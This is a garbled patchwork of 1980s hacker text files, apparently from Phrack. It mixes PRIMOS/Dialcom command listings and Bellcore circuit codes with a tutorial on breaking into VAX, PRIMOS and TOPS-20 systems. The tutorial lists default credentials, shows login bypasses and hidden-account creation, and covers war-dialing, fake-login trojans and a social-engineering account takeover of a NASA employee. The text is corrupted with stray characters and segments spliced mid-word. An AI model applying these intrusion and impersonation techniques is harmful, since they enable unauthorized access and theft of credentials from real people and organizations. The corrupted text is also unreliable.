information on all PRIMOS commands. You could then enter COPY to obtain information on that specific topic. Files And Directories: ---------------------- The name of a file or sub-directory may have up to 32 characters. The filename may contain any of the following characters, with the only restriction being that the first character of the filename may not be a digit. Please note that p ka BLANK spaces are NOT allowed ANYWHERE: A-Z .....alphabet 0-9 .....numeric digits & .....ampersand # .....pound sign $ .....dollar sign - .....dash/minus sign * .....asterisk/star . .....period/dot / .....slash/divide sign Naming Conventions: ------------------- There are very few restrictions on the name that you may give a file. However, you should note that many of the compilers (language processors) and commands on the PRIME will make certain assumptions if you fol qFW/low certain guidelines. File name suffixes help to identify the file contents with regard to the language the source code was written in and the contents of the file. For instance, if you wrote a PL/1 program and named the file containing the source code 'PROG1.PL1' (SEGmented loader) would take the binary file, link all the binary libraries that you specify and produce a file named 'PROG1.SEG', which would contain the binary code necessary to execute the program. Some common filen \ΐname suffixes are: F77, PAS, COBOL, PL1G, BASIC, FTN, CC, SPIT (source files) These all denote separate languages and get into more advanced programing on PRIMOS. (e.g. FTN=Fortran). BIN=the binary code produced by the compiler LIST=the program listing produced by the compiler SEG=the linked binary code produced by SEG Some files which do not use standard suffixes may instead use the filename prefixes to identify the contents of the file. Some common filename prefixes are: B Binary suh capacity 6.312 mb/ps HF- High capacity 6.312 HG- High capacity 274.176 mb/s HS- High capacity subrate LB- Voice-non switched line LC- Voice-switched line LD- Voice Switched trunk LE- Voice and tone-radio landline LF- Data low-speed LG- Basic data LH- Voice and data-PSN access trunk LJ- Voice and data SSN access LK- Voice and data-SSN-intermachine trunk LN- Data extension, voice grade data facility LP- Telephoto/facsimile LQ- Voice grade customized LR- Protection relay-voice grade Lt/5Z- dedicated facility MQ- Metalic customized NQ- Telegraph customized NT- Protection alarm-metalic NU- Protection alarm NV- Protective relaying/telegraph grade NW- Telegraph grade facility-75 baud NY- Telegraph grade facility- 150 baud PE- Program audio, 200-3500 hz PF- Program audio, 100-5000 hz PJ- Program audio, 50-8000 hz PK- Program audio, 50-15000 hz PQ- Program grade customized SB- Switched access-standard SD- Switched access-improved SE- Special access WATS-access-std SF- Speu3cial access- WATS access line improved SJ- Limited switched access line TQ- Television grade customized TV- TV Channel one way 15khz audio TW- TV Channel one way 5khz audio WB- Wideband digital, 19.2 kb/s WE- Wideband digital, 50 kb/s WF- Wideband digital, 230.4 kb/s WH- Wideband digital, 56 kb/s WJ- Wideband analog, 60-108 khz WL- Wideband analog 312-552 khz WN- Wideband analog 10hz-20 khz WP- Wideband analog, 29-44 khz WR- Wideband analog 564-3064 khz XA- Dedicated digital, 2.4 kb/vrs XB- Dedicated digital, 4.8 kb/s XG- Dedicated digital, 9.6 kb/s XH- Dedecated digital 56. kb/s Now the last two positions of real importance, 5 & 6 translate thusly: Modifier Character Position 5 ------------------------------ INTRASTARE INTERSTATE ------------------------------------- A B Alternate data & non data ------------------------------------- C Customer controlled Service --------------------wi8----------------- D E Data ------------------------------------- N L Non-data operation ------------------------------------- P Only offered under intra Restructured private line (RPL) tariff ------------------------------------- S T Simultanious data & non-data ------------------------------------- F xcaZ< Interexchange Carriers is less than 50% ------------------------------------- G Interstate carrier is more than 50% usage =============================================================================== MODIFIER CHARACTER POSITION 6 -------------------------------------------------------------- TYPE OF SERVICE Intra LATA -------------------------------------- ALL EXCEPT US GOVT US GOVERNMT ------------------y-------------------- T M Circut is BOC customer to BOC customer all facilitys are TELCO provided -------------------------------------- C P Circut is BOC/BOC and part of facilitys or equipment is telco provided -------------------------------------- A J Circut is BOC/BOC all electricaly zFɐ connected equip is customer provided -------------------------------------- L F Circut terminates at Interexchange carrier customers location -------------------------------------- Z Offical company service -------------------------------------- Interlata S S Circut terminates at Interexchange {{x carriers point of term (POT) -------------------------------------- V V Circut terminates at an interface of a Radio common carrier (RCC) -------------------------------------- Z Official company service -------------------------------------- Corridor Y X Corridor circut ------------------|~ Z2-------------------- International K H Circut has at least 2 terminations in different countries -------------------------------------- interexchange carrier Y X Transport circut between Interexchange carrier terminals. ---------------------------------------- So 64FDDV would be a private line data circut terminating at a radio common carrier. Other examples can be decoded likewise. Enjoy this information as much as I've had finding it. -= The Mad Phone-man =- ------------------------------------ Z Official company service -------------------------------------- Corridor Y X Corridor circut ------------------~rY? Which one is the Alarm Line? Bell has a specific set of codes that enable you to identify what you're looking at. These are the same codes the installer gets from the wire center to enable him to setup the line, test it, and make sure it matches the customers order. Here are some extracts from the Bellcore book. First lets take a Hypothetical Line number I'm familiar with: 64FDDV 123456 ------------------------------------------------------------- The serial number format:  Prefix + service code + modifier + serial number + digits: 1,2 3,4 5,6 7,8,9,10,11,12 continued ------------------------------------------------------------------------- Suffix + CO assigning circut number + segmet digits: 13,14,15 16,17,18,19 20,21,22 ------------------------------------------------------------------------- The Important shit is in the 3d thru 6th digit. SERVICE CODES Intra or Inter LATAW Block 1-26 ----------------- AA- Packet Analog Access line AB- Packet switch trunk AD- Attendant AF- Commercial audio fulltime AI- Automatic Identified outward dialing AL- Alternate services AM- Packet, off-network access line AN- Announcement service AO- International/overseas audio (full time) AP- Commercial audio (part time) AT- International/overseas audio (part time) AU- Autoscript BA- Protective alarm (CD) BL- Bell & Lights BS- Siren control CA- SSN Access CB- OCC Audio facili utys CC- OCC Digital facility-medium speed CE- SSN Station Line CF- OCC Special facility CG- OCC Telegraph facility CH- OCC Digital facility High-speed CI- Concentrator Identifier trunk CJ- OCC Control facility CK- OCC Overseas connecting facility wide-band CL- Centrex CO line CM- OCC Video facility CN- SSN Network trunk CO- OCC Overseas connecting facility CP- Concentrator identifier signaling link CR- OCC Backup facility CS- Channel service CT- SSN Tie trunk CV- OCC Voice grade faciclity CW- OCC Wire pair facility CZ- OCC Access facility DA- Digital data off-net extention DB- HSSDS 1.5 mb/s access line DF- HSSDS 1.5 mb/s hub to hub DG- HSSDS 1.5 mb/s hub to earth station DH- Digital service DI- Direct-in dial DJ- Digit trunk DK- Data Link DL- Dictation line DO- Direct-out dial DP- Digital data-2 4 kb/s DQ- Digital data-4 8 kb/s DR- Digital data-9.6 kb/s DW- Digital data-56 kb/s DY- Digital service (under 1 mb/s) EA- Switched acess EB- ENFIA II end office trunk OcEC- ENFIA II tandem trunk EE- Combined access EF- Entrance facility-voice grade EG- Type #2 Telegraph EL- Emergency reporting line EM- Emergency reporting center trunk EN- Exchange network acess facility EP- Entrance facility-program grade EQ- Equipment only-(network only) assignment ES- Extension service-voice grade ET- Entrance facility-telegraph grade EU- Extension service-telegrasph grade EV- Enhanced Emergency reporting trunk EW- Off network MTS/WATS equivalent service FD- Priva`6te line-data FG- Group-supergroup spectrum FR- Fire dispatch FT- Foreign exchange trunk FW- Wideband channel FV- Voice grade facility FX- Foreign exchange HP- Non-DDS Digital data 2.4 kb/s HQ- Non-DDS Digital data 4.8 kb/s HR- Non-DDs Digital data 9.6 kb/s HW- Non-DDS Digital data 56 kb/s IT- Intertandem tie trunk LA- Local area data channel LL- Long distance terminal line LS- Local service LT- Long distance terminal trunk MA- Cellular access trunk 2-way MT- Wired music NA- CSACC Li Rnk (EPSCS) NC- CNCC link (EPSCS) ND- Network data line OI- Off premises intercommunication station line ON- Off network access line OP- Off premises extension OS- Off premises PBX station line PA- Protective alarm (AC) PC- Switched digital-access line PG- paging PL- Private line-voice PM- Protective monitoring PR- Protective relaying-voice grade PS- MSC constructed spare facility PV- Protective relaying-telegraph grade PW- Protective relaying-signal grade PX- PBX station line PZ- MSC . constructed circut QU- Packet asyncronous access line QS- Packet synchronous access line RA- Remote attendant RT- Radio landline SA- sattelite trunk SG- control/remote metering signal grade SL- secretarial line SM- sampling SN- Special access termination SQ- equipment only-customer premises SS- dataphone select-a-station TA- Tandem tie-trunk TC- Control/remote metering-telegraph grade TF- Telephoto/facsimile TK- Local PBX trunk TL- Non-tandem tie trunk TR- turret or automatic call d istributor (ACD) trunk TT- Teletypewriter channel TU- Turret or automatic call distributor (ACD) line TX- Dedicated facility VF- Commercial television (full time) VH- Commercial television (part time) VM- Control/remote metering-voice grade VO- International overseas television VR- Non-commercial Television (7003,7004) WC- Special 800 surface trunk WD- Special WATS trunk (OUT) WI- 800 surface trunk WO- WATS line (OUT) WS- WATS trunk (OUT) WX- 800 service line WY- WATS trunk (2-way) W r#Z- WATS line (2-way) ZA- Alarm circuts ZC- Call and talk circuts ZE- Emergency patching circuts ZF- Order circuts, facility ZM- Measurement and recording circuts ZP- Test circut, Plant service center ZQ- Quality and management circuts ZS- Switching, control and transfer circuts ZT- Test circuts, central office ZV- Order circuts, service SERVICE CODES FOR LATA ACCESS --------------------------------------------------- HC- High capacity 1.544 mb/ps HD- High capacity 3.152 mb/ps HE- Hig-es of a file. SU Yields number of phone lines in use. SY Reveals users on given system; shows system status. SYS Tells user what system he/she is on. SYSAVE Invokes disk-to-tape system save program. SYSNEWS News updates for the PR1MECOM network. SYSTAT Reaveals users on given system; shows system status. TAPEMARK Creates a tapemark. TAPXAM Examines tapes. TECO . Limited function text editor. TELELINK Gateway into the TELELINK system. TIMES Yields time related system statistics. TIMETAB Yields statistics on user time for supervisors. TNET Predominantly used with MAIL; transfers files over given network. TV950 Sets up function keys for televideo 950. TY Types out specified file. TYB Types out specified file /Y1backwards. TYL Types out files with extra long lines. UCNT Yields number of users on system. UFDVER Compares all files in two different UFDs. UG Statistics on users by user group. UNISTOX Yields stock wire reports. UNIT Yields disk number when given description. UNUNIT Explains disk unit number. UPCASE Reformats files containing lower case alphabet characters, 0b making them suitable for output to uppercase device. UPI Gateway to UPI Datanews system. UPTIME Yields information on uptime for account groups. USAGE Yields usage statistics. USAGE12 1200 baud usage statistics. USCAN Seeks a particular user signed on any system. USELOG.BIN Billing file. Not a command. USRSTAT Graphs usage statistics by account group. USRSTAT24 1t Yields user statistics for a given 24 hour period. VISITERM APPLE VISITERM/PRIME file transfer utility. VPAG Page name program; simulates line printer on terminal. VPSD V-mode version of the Prime Symbolic Debugger. WAKEME Rings bell on terminal when system is brought up or down. WHO Reveals what UFD user is attached to. WP-ENTER Accepts data from word processors. WPIN Accepts dat2fa from word processors. WPMAIL Enables mail sending from word processors. WSIM Shows number of pages in memory for every segment in system. WSIX Shows number of page indexes for every segment in system. WSPG Shows all pages (not just in memory) for every segment in system. X Honeywell compatible Fortran compiler. XBATCH Starts up phantom with a diff3Mmerent logname. XFTN Old version of Fortran compiler containing some features not available with the updated `X'. XMAIL Allows users to send TELEX messages through Western Union. XMAT Gives cross matrix of filed mail within an account group. XMIT Reads in files from word processors. XSU Identical to SU but does not stop at the end of the system.h Western Union. XMA4QNvxT Gives cross matrix of filed mail within an account group. XMIT Reads in files from word processors. XSU Identical to SU but does not stop at the en Shows number of page indexes for every segment in system. WSPG Shows all pages (not just in memory) for every segment in system. X Honeywell compatible Fortran compiler. XBATCH Starts up phantom with a diffv6.3 A Hacker's Guide to Primos: Part 1 by Cosmos Kid 11K 16.4 Hacking GTN by The Kurgan 7K 16.5 Credit Card Laws Laws by Tom Brokow 7K 16.6 Tapping Telephone Lines by Agent Steal 9K 16.7 Reading Trans-Union Credit Reports by The Disk Jockey 6K Phrack World News: 16.8 The Story Of the West German Hackers by Shooting Shark 3K 16.9 The Mad Phone-Man and the Gestapo by The Mad Phone-Man 2K 1\6.10 Flight of the Mad Phone-Man by The Mad Phone-Man 2K 16.11 Shadow Hack Busted Again by Shooting Shark 2K 16.12 Coin Box Thief Wanted by The $muggler 2K Submission to Phrack may be sent to the following BBS's: Unlimited Reality 313-489-0747 Phrack The Free World 301-668-7657 Phrack Inc. (*) The Executive Inn 915-581-5145 Phrack Lunatic Labs UnLtd. 415-278-7421 Phrack (*) House of the Rising Sun 401-789-1809 =BRPhrack * You will get the quickest reply from these systems. 11K 16.4 Hacking GTN by The Kurgan 7K 16.5 Credit Card Laws Laws by Tom Brokow 7K 16.6 Tapping Telephone Lines by Agent Steal 9K 16.7 Reading Trans-Union Credit Reports by The Disk Jockey 6K Phrack World News: 16.8 The Story Of the West German Hackers by Shooting Shark 3K 16.9 The Mad Phone-Man and the Gestapo by The Mad Phone-Man 2K 1"'>l check. PROBLEMS.CPL Lists recent operational and related problems and occurrences. PRMPC Causes specified file to be printed on an MPC parallel interface printer configured to PRIMOS. PROFILE NEWS profile builder. PROGUT Turnkey program consolidating various programming utility commands. PROP Allows operator to control the spooler phantoms. PROW.CPL #Aj@ Protects with wildcard. PRPOST Invokes the private post system. PRSER Causes specified file to be printed on a serial interface printer configured to PRIMOS. PRT Does wildcards and searching by strings. PSD Loads and starts the PRIME SYMBOLIC DEBUGGER, an interactive debugging program. PSD20 AS above, but for use in 16K PRIMOS II. PTF Pulls s$ipecified file from remote system to current system. PTIME Prints out CPU time and Wall Time (time of day in seconds). PTRBLD MIDAS utility. PUSAGE Prints data captured by PBHIST. REFED Edits MAIL.REF. For use by AOS Maagers. REFUSE Enables refusal of express mail, chats, etc.; prevents interruptions. REMAKE Effectively obsolete MIDAS utility; still availabl%'te for limited use. REPAIR Effectively obsolete MIDAS utility; still available for limited use. REPUD Changes security levels by account group. REQUEST Forms processing package allowing creation or transmission of any standardized form. RESEG Reverses the effect of DESEG, i.e. reconverts a SAM file back into a segment directory. REVERT &~ Effectively obsolete MIDAS utility available for limited use. Enables backward movement by rev number. REWIND Causes tape on assigned drive to rewind. RJ80 Supports communication line for 2780. RL Runs commands from CATLIB. RMAGRST Performs a MAGRST on a remote system. RMAGSAV Performs a MAGSAV on a remote system. RPCSLAVE Starts up a slave which services requests from other'3 systems. RPG Invokes the Prime RPGII compiler. RSE Obtains time from remote system. RSHARE Performs share command on a remote system. RSYSAV Performs a SYSAVE on a remote system. RUNOF Dialcom's text formatter. Useful in producing manuals, reports, studies, or any body of text with special formatting requirements. RUNOF-INDX Builds ind(.ex file for RUNOF if desired. RUNOF..CPL Directs user to the RUNOF command. RUNOFF Prime's text formatter. Controls margins, indentations, line spacing, etc. SATR Changes file attributes. SCAN Looks for files matching given wildcard name anywhere in file service. SCOPY Yields segmented copy. SDC Gateway to System Development Corporation. Provides access ) to millions of books, articles, reports, studies, etc. SDC.TYM Tymnet version of above. SECLEV Changes and/or reports security level for user's ID. SEG Invokes a utility for loading, modifying, running, and sharing segmented (V- and I-mode) programs. SEG16 Rev 16 version of above. SEGED Segment directory editor. Allows seclev 5 and above to view and *ъ)manipulate segments within a SEGDIR file. SETBLZ Sets up BLZsearch files. SETBLZ.DAT Not a command. File used with SETBLZ command. SETCAT Sets up pointers to special UFDs. SETERM Sets terminal type for terminals with clock/status line and programmable function keys. SETT Sets read-write locks. SFRWLK Sets file rewrite lock. SI Determines the size of a file in words+-k. SIGNAL.CPL Signals a condition. SIZE Determines the size of a file in blocks and words. SLIST Prints the contents of a file at the user's terminal. SORT Sorts up to twenty files into a single output file, sorting in ascending or descending order on up to sixty four keys. SPELL Spelling error detection and correction. SPL Programming language. SPL.19 ,2 Rev 19 version of above. SPOOL Allows user to submit desk files to be printed or plotted on system line printers or plotters. SPSS Statistical Package for the Social Sciences. Analyzes survey data. STATS Yields system usage statistics since last re-boot. STORAGE Yields disk space being used on a particular UFD. STY Short TY. Types out first seventy two linRlII. MAIL Invokes the mail system. MAILCK Takes user directly from command mode into the MAIL system for a mail check. MAKE Partition builder. Creates a Primos disk. MAKE18 Rev 18 version of above; for use in Primos II. MCHECK Checks the mailbag. MCLUP Invokes the MIDAS clean-up utility. MEDLINE Gateway to the Medline system. MEDLINE.TYM Tymnet version of above. MENUPD AOS menu.control updater. MGRNEWS Newsfile for AOS system managers. MINITAB Statistical computing system for general use. MPACK Packs and restructures MIDAS files. MRGF Enables merging of two to five ASCII files. MTUSR Yields status of tape drive use. MUTIL Mail utilities. NAME Sets name in NUMB file. NCOBOL COBOL compiler. Generates R-modVke code and uses non-shared COBOL library, NCOBLB. NET-TALK A conferencing utility handling up to 128 conferences simultaneously. NETCFG Enables review of old or creation of new network configuration. NETCON Not a command. System network configuration. NETLINK Enables connection with any system on the Public Data Network or within Dialcom. NETREC P Not a command. Network error message file. NETSTAT Prints out condition of and statistics on all systems. NETWORK Looks up numbers for Telenet and Tymnet. NEWS Invokes the UPI news database. NHITFS Yields/locates statistics on file service performance. NSED Non-shared version of the text editor. Available in Primos II. NSORT A command for general sorting of files oun the Dialcom/Prime system. NSY Yields user statitics (including point of origin). NSY& Yields user statistics (including point of origin and baud speed). NUMBER Numbers or renumbers statements in a BASIC program. NUSAGE New Usage. Will eventually replace the USAGE command. NYT-FULL Gateway into New York Times Info-Bank system. NYTI Version of above. NYTS.s? Version of above. NYTSIB1 Version of above. NYTSIB1.TYM Tymnet version of above. NYTSIB2 Version of above. NYTSIB2.TYM Tymnet version of above OAG Provides direct access to the electronic edition of The Official Airline Guide's airline flight schedule information. OAG2 As above; through another system. OBJCON Utility program for concord PMA Loads Prime Macro Assembler and begins assembly of specified source file. POST Bulliten board system acting as companion to MAIL. POSTER Prints posters on paper terminal. PRIMOS PRIMOS pre-loader. PRINT Initiates print jobs. PRMAIL Invokes the private mail system. PRMAILCK Takes one from command level directly into private mail for a mai yYave short demonstrations of programs. DESEG Converts a segment directory into a SAM file DIALOG Gateway command. DIALOG.TYM Tymnet version of DIALOG. DIALOG2 Secondary gateway command. DIAMAILCK Special mail check. DICUTIL Dictionary utility for modifying a personal dictionary. DIRED Invokes EDIT mode for group mail directory. DISKRPT Determines disk usage. DISKSTAT Yie lds statistics on disk usage. DJNS Gateway into the Dow-Jones system. DL Delete utility. Will eventually replace DEL command. DLN Deletes line numbers in a file. DMP Dumps memory in operating system. DMPLGR ,E<6>,TURN L,N, TURN L,W,(UP!),FACE E,E,E,TURN R,S,TURN R,W<6>,TURN L,S<5>,TURN R,W<7> TURN R,N,TURN R,E<5>,TURN L,N,TURN L,W<9>,TURN L,S<7>,TURN R,W,TURN L,S,S,S (RIDDLE-SKULL),TURN R,W,W,W,(CASٜ)T PHDO),W,(FOR LOTS OF EXPERIENCE GO STRAIGHT)TURN Lou for duplicate UFDs. DUSAGE Calculates dual usage reports; for billing purposes. EB.CPL Creates a back-up, then moves into EDIT mode. ED Invokes the EDIT mode. ED2 As above, but uses ED2 param.ini line. EDB Manipulates object files from compilers. EDITR Invokes the binary file editor. EDKIDA Midas utility. EIES ; Gateway to EIE system. EMIT A version of XMIT; recieves data from word processors. ENTER Enables the entering of a text. EVAL.CPL Expression evaluator. EX.CPL Compiles, links, and loads programs. EXEC Predecessor of CPL. EXPAND Enables expansion of ASCII files. F Files command. F77 Fortran 77 compiler. FADE Tests cursor positioning. FCOPY O File copier. FDL Invokes the Forms Definition Language. FEIGN Changes user name. FILMEM Fills memory locations to the top of 32K with zeros. FILVER Invokes a comparison and verification process for comparing runfiles. FIXRAT Maintainance program; checks/fixes the file integrity of a disk pack. FIXRAT19 Rev19 version of FIXRAT. FORCEW Q Updates disk from EDIT mode. FSHASH.CPL Invokes calculation program. FTN Fortran compiler. FTP Transfers files across systems. "The file pusher." FUN Yields file unit status. FUTIL Invokes the file utility program. FUTIL18 Rev18 version of FUTIL GCO Cominput file from group (XXX000) account. GED Prime version of the Honeywell editor. GP Gets apassword. HELP.CPL Gives brief HELP message. HEVAL.CPL Similar to EVAL, with results in HEX. HEXD Tape dump program. HPSD Loads a version of PSD stored in upper portions of memory. IAM Sets up object field. INDENT PLP indenting program. INFO Lists all INFO files. INMEM Yields usage of shared memory. INSTALL.CPL Used for installation of programs on all systems. M IPSD I-mode version de-bugger of PSD. JED Binary editor. JU Text justifier. JURIS Gateway into Juris system. Unique to each system. JUSTFY Text justifier. KBUILD Midas command. Builds a keyed-index file of fixed-length records. KDUMP Midas subsystem dump utility. KIDDEL Deletes all or part of the records in a keyed-index file KPAS 9Ǜ Kills password on an ID. LABEL Initializes magnetic tapes. LATE Requests time at which next command is to be given. LEGIS.TEL Gateway into Legislative system. Unique to each system. LEGIS.TYM Tymnet version of above. LINK.CPL Comparable to EX.CPL. Links but does not execute programs. LOAD Loads and starts LOAD, the linking loader for PRIMOS. LOGIN Used to begin an operating session. LOGPRT Writes contents of LOGREC or NETREC into disk file or onto terminal. LOGREC Yields system error file. LON Last on an ID. LP Prints file with forms control at terminal. LPFLTR Cleans print files. LS Lists directory. Version of L. LTIME Lists time of file. MAGNET Simplifies transfer of non-Prime format magnetic tapes to and from Prime systems. MAGNET18 Rev 18 version of above; for use in Primos II. MAGRST Restores information from magnetic tape back into the Primos system. MAGRST18 Rev 18 version of above; for use in Primos II. MAGSAV Writes information from a Primos configured disk to a 7 or 9 track magnetic tape. MAGSAV18 Rev18 version of above; for use in Primos ;h E` tutorials I have seen. Some systems are equiped with a X29 gateway or PSIPAD as they refer to it. It's basically what the name suggest, a gateway to PACKET SWITCHED NETWORKS. To activate it, type: $ SET HOST/X29 And the system should respond with 'Node:' You will then find out if the PSIPAD is installed and whether you have the privs to make use of it. that it blends in with the backround. To do that, run the ADDUSER or AUTHORISE program in the SYS$SYSTEM directory, I don't thinaUPrints out system usage data. ADDR Gives disk address of a file. ADM42 Sets ADM42 terminal function keys. ADM42A As above, but does not change the escape key. ADM42F Sets ADM42 terminal function keys at full duplex. ADMRESET Changes escape key back to 233. ALN Adds line numbers to a file. ALTCMD Allows high seclev users to change their alternate command directory PY AMLCMO Prime command for communicating over AMLC lines. AOSLOGIN Secondary login program for AOS users. AOSNEWS Invokes newsfile for AOS users. AOSUTIL Turn key program enabling AOS managers to implement new features. ASC Systems group utility. Yields octal values of characters. AU.18 Rev 18 version of AUTOPSY (see below). AU.19 Rev 19 version of AUTOPSY (see belouQw). AUTODOC Produces documentation from source file for use with INFO. AUTOHANG Hangs up the phone automatically when the user signs off. AUTOPSY Reads in/manipulates dump tapes. AVAIL Yields available disk space. AW Attaches to work directory. AW2 As above. AW3 As above. AW4 As above. BASIC Programming language. BASICV Invokes a virtu"Ƭal-memory BASIC subsystem. BASICV15 Rev 15 version of BASICV. BASINP Inputs BASIC programs. BIGSORT Large version of NSORT. BREAKE Enables breaks. BREAKI Inhibits breaks. BRS Gateway into Bibliographic Research Service system. BYE Line "off"; deletes empty files. CAL Executive Calendar Scheduling system. See CALENDAR below. CALC Desk calculator prograkN}m. CALENDAR Executive Calendar Scheduling System. CALENDAR.UTILITIES Contains routines for setting up new CALENDAR systems, checking for errors, and other maintainance utilities. CATA Directory listing CCSBILLING Used monthly for CCS billing procedures. CCSUT CCS utility program CF77.CPL Conditional compile F77 program CFTN.CPL Conditional compile FTN program CHAT AllowSs users to chat with one another. CIPHER Decrypts old ciphered files. CLEAR Clears screen; ejects page if terminal type set. CLMAIL Closes mail office. CMPF Compares up to five ASCII files of any length. CMPRES Compresses ASCII files. CNCHK Checks for control characters in a file. COBOL Programming language. COBOL16 Rev16 version of COBOL. COMET Enables lvink with COMET mail system. COMP_EPUB.CPL Compiles and loads EPUB program. CONCAT Enables combination of many input files into one output file. CONFER Permits users to access shared conference files. CONFIG.18 Not a command. Used with system start-up. COPY Copies disk to disk at rev18 and below. COPY_DISK Copies disk to disk at rev19 and beyond. COUNTIT Character frequency count  er. CPASCAL.CPL Checks a file and recompiles it if necessary. CPL1.CPL Conditional compiler for PL1 program. CPLP.CPL Conditional compiler for PLP program. CPMA.CPL Conditional compiler for PMA program. CREATK MIDAS command. Invokes a program to build a template for multiple index files. CRTLST Lists a file. Stops every 24 lines. Identical to TY. CRYPTO Ensures file security b a)wy encrypting files. CSI Accesses the Capital Services Databases. CTRLCK Control locator. CXFTN.CPL Conditional compiler for XFTN program. C_CN-USELOG Invokes input stream at start-up time. C_NETCFG Input stream to build NETCON. C_NL Used for installation of LOGIN. C_PRMO18 Used with system start-up. Unique to each system. C_USELOG Renames a uselog file. C_XL Used for $%˨ installation of experimental LOGIN. D44 Dumps four-bit bytes in decimal. D80 Dumps in words. DBASIC Programming language having double-precision arithmetic capabilities. DBG Invokes the source-level debugger. DCTOOC Performs decimal to octal conversion. DEL Deletes specified file. DELP Deletes by wildcard name. DEMO Prints files which h0 E to identify the user' just talk about some technical bullshit about the structure of NUI's, how the billing computer stuffed up and how your arse is going to get kicked. Its a good idea to ask the person to come down to the main office. (you know all the details, and so you must). Then suggest the possibility of fixing it all up over the phone. If it's a jerk, you'll get it on the spot, if not, give him a number to call back. Ie a PHONE BOX around 1gGthe corner. And that's all there is to it. You will be surprised how co-operative people are. The same principal can also be used in few other situations. There is no reason why a system operator can't change the password of another user for you. This was basically my introduction to the art of SOCIAL ENGINEERING and this is what took place: I hacked a Dialcom System 41, which me and a lot of YANKS were using to call ALTOS and other systems. Unf2·ortunatelly, it died for reasons I am still emebarrased about. This is what we did. I knew that the real user wasn't on the account all that often, so she would have not yet known about the death of her account. Fortunatelly, we had a hard copy of the user list in her UFD series and of her mail. (I THINK THIS IS A GOOD TIME TO STRESS THE IMPORTANCE OF RECORDING EVERY BIT OF DATA YOU GET FROM A SYSTEM. IT'S ALWAYS USEFULL AT SOME STAGE IN THE FUTU3$&SRE. IF ONE IS FORTUNATE TO HAVE A HARD DISK, SIMPLY SAVE ABSOLUTELLY EVERYTHING YOU DO ONLINE, BUT TAKE SOME PRECAUTIONS FOR OBVIOUS REASONS) The first step was to find her details. Ie Address, Phone number, and Christian NAME. We rang up the operator to give us a listing of all AUGUSTINES in the aproximate area as deduced from the mail. There were only a few so we went through them. No luck, she had an unlisted number. Ok, so we called a CNA 4kP(CNA is like a information directory, but used by the phone companies emploees only. CNA = Customer Number/Address I think. Unfortunatelly I never came across an Australian CNA, but you can bet they're out there), but the number had been changed, so we rang up a friend who was mentioned in the mail. MRS M.AUGUSTINE worked for NASA so TRADER introduced himself as some important figure in the NASA organization and we got all the details we wanted. All5Ō! we had to do then is ring up DIALCOM and get them to change the password. We said that the wife was in GERMANY using DATEX-P and that she can't get onto her account, where some important mail was waiting for her. Naturally the password was changed on the spot and no information of any sort was requested. 4> Trojan Horses are another way of getting passwords. It basically involves the simulation of another system login and setting up a few users 6Ym to take the bait. Ie, Stick your computer onto a phone box at a time a person is likely to call, give that person the number. Ie it has been changed or it's a different system with faster responces thus saving online time etc. Then have your computer to simulate the real login and that's all there is to it. This is a very primitive trojan and I will talk more about them later on and tell you how to set up a few of them on DIALCOM systems. A Most Imp7}Jortant thing is to make sure that once you get into a system, you are there to stay, or the effort would have been more or less waisted. Always get all the information you can. Mail, Usernames and any information on the other users. Basically anything the system has to offer, no matter how insignificant it may Seem at the time. DEFFAUL PASSWORDS, VAX, UNIX, PRIMENET, DIALCOM ------------------------------------------------ There is a large variety of systems, but a lot of them have g82ot common accounts. It is always a good idea to try hacking usernames such as TEST, DEMO, GUEST, VISITOR etc, using the most basic and easilly remembered passwords you can think off. Deffault accounts are very usefull indeed and here is a basic rundown of a few major systems: VAX ---- When you encounter a VAX, trying the following may prove quite successfull. USER/USER, GUEST/GUEST, GAST/GAST (if in europe), FIELD/SERVICE, FIELD/TEST, SYSTEM/MANAGER, SYSTEM/OPERATOR, SYSTEM/SYS9ɝiTEM, SYSTEST/TEST, SYSTEST/SYSTEST SYSTEST/UETP. Also try them in lower as well as upper case, if the system does not translate lower to upper case. If you are lucky enough to get an account with full privs, namelly SYSTEM/MANAGER, or FIELD/SERVICE, look at some of the user names, ie SHOW USERS command, and create your own username of a simmilar format so that it blends in with the backround. To do that, run the ADDUSER or AUTHORISE program in the SYS$SYSTEM directory, I don't thin:=k I need to go into any more detail since there are literally hundereds of good files on VAX systems. If you come accross a captive account, ie you are not allowed direct access into DCL (Digital Command Language), typing /NOCOMM can prevent the execution of certain login files which may prevent you from accessing DCL or lower your access level. Example Login: Username: USER/NOCOMM Password: USER $ There is one other important thing about VAX's that is not mentioned in any VAX%Lot to list the number in any public listing, you will most probably find it listed in the FAX DIRECTORY, which is available from Telecom. It's an equivalent of a phone book with only data lines listed. So, just grab a copy of the directory and look up the company. Chances are that it might be there. One can even find BBS systems in there if they have been registered by the Sysop. 2> When a company sets up their phone network, they usually plan ahead and&7 a lot of times when they get voice and data lines assigned, they will be very close together in value. So, simply look up the victims voice line and try a few numbers lower and higher than the voice number. Again there is a chance of comming up with something. 3> The last resort, is scanning phone numbers in series for a carrier tone. It can take a lot of time, and be very expensive, since we just can't use the same hardware to make toll free cal'jqls like they do in the USA. There is a feasable way of doing though. A lot of systems will answer after the first few dial tones, so set your demon dialer program to dial a number, sit there for only a few ring tones and hang up. The longer you let it ring, the more accurate it will be, but more costly, if people have enough time to pick up the phone. If you let it ring about 3-4 times and you have your scanner going at 4am, you should have very fe(ζw problems, either with accuracy and finance. There are some fancy alternatives like tapping another line, using a phone box etc, but they are too messy. OBTAINING PASSWORDS, INFOLTRATING SYSTEMS ------------------------------------------ There are a few methods available which you can use to get into systems. 1> The most common and by far the least successful in regards to the amount of time waisted is the ole front line security warfare. It basicaly means ph)p ysically trying to guess a username/password pair for the system trying random, but logical combinations, or using prior knowledge of the system, ie DEFAULT ACCOUNTS, USERNAME STRUCTURES etc. A Sophisticated Sprinter can be a great aid, but it's a good idea to have some prior knowldge of username formats. A system that will actually tell you that a username is invalid, before you enter a password, is as good as hacked. Some PRIMENETS, VM/370's and *kBTOPS-20 systems are about the best examples. 2> Many systems, particularly new ones, tend to have weak points in their front line security which you can use to gain access.. Here is a small list which I have found, but there are many more. - TOPS-20 Systems have a FINGER command before login, which can be used to examine files, mail etc, without the knowldege of a Password. They also have a SYSTAT command which lists the online +сqe users which can be used before you login. A lot of them have now been changed and the FINGER command removed, but still there are a few out there. - PRIMENETS, These had a few weak points in the early versions, but a lot of them are now non-existent, if they are running later versions of PRIMOS. It's still a good idea to know about them, because I have found few systems which have not been updated. Ok, w,XiZhen you are prompted for a password on the old primos, and you have a legitimate username, typing CTRL-C for password, can give you access. Another weak point of most Primenets, are the Default accounts, mainly TEST, which often have no need for a password. To crash the system from captive mode into primos, CTRL-P pressed several times will often do the job. CTRL-P when pressed in the right spot will crash 